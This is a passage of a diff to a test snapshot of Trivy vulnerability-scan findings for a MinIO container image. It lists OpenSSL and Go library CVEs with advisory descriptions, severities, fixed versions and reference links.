"installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "X.400 address type confusion in X.509 GeneralName", + "references": [ { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", - ], - }, - "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "request smuggling", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", - ], - }, - "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", - ], - }, - "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://linux.oracle.com/cve/CVE-2023-0464.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", + ], + }, + "category": "Vulnerability", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6039-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + 